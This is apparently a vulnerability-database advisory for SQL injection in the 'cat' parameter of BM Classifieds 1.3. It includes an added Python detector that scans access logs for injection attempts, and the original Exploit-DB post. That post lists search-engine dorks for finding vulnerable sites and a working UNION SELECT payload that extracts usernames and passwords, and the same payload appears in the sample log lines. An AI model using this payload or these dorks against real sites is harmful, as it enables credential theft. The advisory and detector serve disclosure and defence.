Vendor: BM Classifieds
By: Dr.0rYX & Cr3w-DZ
CVSS: 7.5 (HIGH)
Vulnerability: SQL injection
CWE: 89
Product Name: BM Classifieds
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

BM Classifieds ads SQL injection vulnerability

An attacker can exploit this vulnerability by sending crafted SQL in the 'cat' parameter of the 'classifieds.php' script. This allows the attacker to gain access to the database and extract sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
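
For sites that cannot confirm when the patch was applied, the access logs can be reviewed for past abuse of this parameter. The Python function below is an added example, not part of the original advisory or the vendor's code; it assumes 'cat' is a numeric category id (as in the cat=144 request on this page) and that logs are in combined log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /classifieds.php?cat=144 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /classifieds.php?cat=144+union+select+username,password,3,4+from+users HTTP/1.1" 200 812
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /classifieds.php?cat=144%20UNION%20SELECT%201,2,3,4 HTTP/1.1" 200 640
198.51.100.2 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?cat=about HTTP/1.1" 200 900
198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /classifieds.php?page=2 HTTP/1.1" 200 4300
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Keywords that have no place in a numeric category id.
SQL_WORDS_RE = re.compile(r"\b(union|select|from|information_schema)\b", re.I)


def suspicious_cat_requests(log_text, script="classifieds.php", param="cat"):
    """Return (client_ip, decoded_value, reason) for each request to `script`
    whose `param` value is not a plain integer (assumed to be the valid form)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes both '+' and %XX, so encoded values are normalized.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if value.isascii() and value.isdigit():
                continue
            reason = "sql-keywords" if SQL_WORDS_RE.search(value) else "non-numeric"
            hits.append((ip, value, reason))
    return hits


if __name__ == "__main__":
    for ip, value, reason in suspicious_cat_requests(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value}")
```

The same integer-only rule can be enforced at the application or WAF layer as a stopgap until the upgrade is in place.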

Exploit-DB raw data:

###############################

                                                  ALGERIAN HACKER
   **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            BM Classifieds ads SQL injection vulnerability
  [!] Author    : Dr.0rYX & Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.bmscripts.com/
  [+] script   : powered by BM Classifieds
  [+] Demo : http://classifieds.bmscripts.com/
  [+] Version() : 1.3
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"classifieds.php?cat="
               inurl::"showad.php?listingid="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/classifieds.php?cat=[N.A.S.T ]

  [ Exploit ]

  http://server/classifieds.php?cat=144+union+select+username,password,3,4+from+users

  [  GReet ]

  [+] :xcv-dz , CLAW , kader11000 ,le0n , exploit-db.com , ALL HACKERS MUSLIMS